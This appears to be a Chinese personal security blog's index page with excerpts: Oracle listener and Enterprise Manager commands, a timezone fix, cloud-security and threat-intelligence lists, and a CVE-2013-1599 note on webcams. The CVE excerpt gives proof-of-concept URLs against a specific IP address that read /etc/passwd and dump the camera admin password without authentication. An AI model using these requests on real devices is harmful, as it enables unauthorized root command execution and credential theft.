WeiyiGeek

杂而不纯,不博也不精 | 学不止步,勿忘初心

无标题

监听的常用命令

lsnrctl start [listener_name]

lsnrctl stop [listener_name]

lsnrctl status [listener_name]

lsnrctl service [listener_name]

lsnrctl reload [listener_name]

#安全设置
https://blog.csdn.net/edwzhang/article/details/51801329

Oracle数据库周边产品
OracleWeb-OEM企业管理器

Oracle 10g OEM管理界面(Oracle企业管理器,简称OEM)– 类似于PHPmyadmin的Web站点
首先,启动OracleDBConsoleXXX服务

http://<oracle服务器名称>:<EM端口号>/em
例如:http://localhost:1158/em

Oracle10G Web-OME错误解决
1)OEM website :java.lang.Exception: Exception in sending Request :: null
WeiyiGeek.

1.找到oracle安装目录中db_1/计算机名_orcl/sysman/config/emd.properties ,在emd.properties文件 最后一行 的
agentTZRegion=GMT 改为 agentTZRegion=Asia/Chungking //(我在郑州,验证可用,其他地区未试)
/////这个可能需要复制出去,改完再复制回来,因为权限不够
2.在dos 窗口输入停止dbconsole服务(下同)

emctl stop dbconsole
////前提set oracle_sid=wangdan(wangdan也就是数据库全局变量名,也就是数据库名)

///命令必须在管理员权限下面执行

3.使更改设置生效

emctl config agent getTZ
4.启动dbconsole服务
emctl start dbconsole
阅读更多
无标题

SparkLAN网络摄像头

CVE-2013-1599

描述:该摄像头产品中/var/www/cgi-bin/rtpd.cgi可在未验证情况下接受攻击者的恶意请求,以root身份执行任意命令。

多个D-Link网络摄像头产品’/var/www/cgi-bin/rtpd.cgi’存在输入验证漏洞,允许远程攻击者利用漏洞提交类似如下的请求以应用程序上下文执行任意命令:

漏洞证明:

#1.查看/etc/passwd
http://183.179.253.135/cgi-bin/rtpd.cgi?cat&/etc/passwd

#2.获取摄像头密码
http://183.179.253.135/cgi-bin/rtpd.cgi?echo&AdminPasswd_ss|tdb&get&HTTPAccount

参考:https://www.cnvd.org.cn/flaw/show/CNVD-2013-04632

阅读更多
无标题

学习过程中所遇到的算法:

  • 希尔伯特曲线 (描述IPV4连续空间存活情况)
阅读更多
无标题

云安全领域六种模式:

  • 漏洞扫描 : 云扫描(Qualys / Veracode)
  • 安全CDN : Akamai / CloudFlare
  • 代理 : Zscaler
  • 监控与加密 : CipherCloud
  • 虚拟网络安全 : 360
  • 虚拟服务器安全 : Vmware / 虚拟化提供商

网络安全大数据三个特点:

  • 规模大,结果小
  • 变化快,进化慢
  • 种类多,关联少

威胁情报价值:

  • HASH值 : 恶意代码脚本特征码
  • IP地址
  • 域名
  • 网络或者主机特征
  • 攻击工具
  • TTPs(Tactics/TeChniques/Procedures即策略,技术和程序)
阅读更多
首页 归档 分类 标签 关于 搜索